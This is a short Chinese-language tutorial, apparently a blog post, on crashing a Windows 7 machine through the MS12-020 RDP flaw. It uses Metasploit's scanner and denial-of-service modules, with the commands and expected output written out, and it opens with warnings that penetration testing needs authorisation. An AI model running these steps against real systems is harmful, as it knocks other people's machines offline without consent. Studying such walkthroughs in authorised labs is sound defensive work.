注意:
一:请不要用自己电脑去尝试
二:请不要非法去入侵别人电脑
三:渗透测试是需要授权的!
正文:(这是一个很常见的漏洞
利用漏洞:MS12-020(死亡蓝屏)全称:-->Microsoft windows远程桌面协议RDP远程代码执行漏洞
粗暴地介绍:-->RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。 然后控制系统。
攻击者:Kali linux 2023.4
受害者: Windows 7
利用工具:Metasploit
影响范围:Windows xp 、2003、2008
过程:
首先:利用扫描工具扫描Windows 7的端口,接着如果看到了windows 7的开放端口中具有一个3389。恭喜恭喜。我们可以进行下一步的攻击啦!
然后:win+r打开“运行”后输入cmd,然后输入"msfconsole"键进入Metasploit控制台(首先你要安装Metasploit然后再把文件夹中的"bin"目录添加进环境变量“
再:输入search MS12-020(搜索有没有叫MS12-020的相关利用模块)
接下来可以看到:0:Auxiliary/scanner/rdp/ms12_020_maxchannelids MS120-020 Microsoft Remote Desktop Checker(检查有没有漏洞的)
1:Auxiliary/dos/windows/rdp/ms12_020_maxchannelids MS12-020 Microsoft Remote Desktop Use-After-Free DOS(攻击的)
接着:use 0(使用第一个)
set rhost(受害者IP)
再run
得到结果:The target is vulnerable(意味着受害者有这个漏洞可以利用)
最后(泪目,终于写到最后了):use 1(使用第二个)
set rhost(受害者IP)
Exploit
结果:如果看到后面有:IP地址:3389 - IP地址 seems down
OK! 受害者成功受害!